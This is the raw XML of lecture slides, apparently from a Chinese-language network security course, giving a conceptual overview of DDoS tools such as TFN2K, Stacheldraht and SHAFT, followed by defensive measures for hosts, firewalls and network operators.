              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TFN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的增强版，增加了许多新功能：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>a.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单向的对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的控制通道，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无法发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>b.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>针对脆弱路由器的攻击手段。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>更强的加密功能，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>加密。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>d.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>随机选择目的端口。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TFN2K</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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smtClean="0"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TFN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的特点，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>间的通信加密，增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端的自动更新功能，即能够自动更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主机列表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Stacheldraht</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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smtClean="0"/>
              <a:t>独立发展起来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击方法，特点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在攻击过程中，受控主机之间可以交换对分布端的控制和端口，这使得入侵检测工具难以奏效。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>采用了“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ticket”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>机制进行攻击，使其攻击命令有一定秘密性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>采用了独特的包统计方法使其攻击得以顺利完成。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SHAFT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>到目前为止，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击防御比较困难</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议漏洞，攻击特征不明显，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>eg,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流量汇聚，近身防御无效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>最有效的防御</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络出口禁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无驱动力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各司其职协调防御：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>企业网管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>骨干网络运营商</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的防范 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从主机与网络设备两个角度去考虑。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）主机设置，几乎所有主机都应防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>设置：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关闭不必要的服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>限制同时打开的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>半连接数目</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缩短</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>半连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>time out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>及时更新系统补丁 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>企业网管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Threats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70658" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840"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2EC2B95-86BD-4407-AD89-DE6F7AD0430B}" type="datetime1">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000" smtClean="0"/>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="143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10307" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="1556792"/>
          <a:ext cx="7315200" cy="5365750"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s624733" name="Visio" r:id="rId1" imgW="5554345" imgH="4718685" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId1" imgW="5554345" imgH="4718685" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6247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56792"/>
                        <a:ext cx="7315200" cy="536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0307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="610307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="610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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>网络设备上的设置 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>禁止对主机的非开放服务的访问</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>限制同时打开的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>最大连接数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>限制特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址的访问</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>启用防火墙的防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的属性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>严格限制对外开放的服务器的向外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
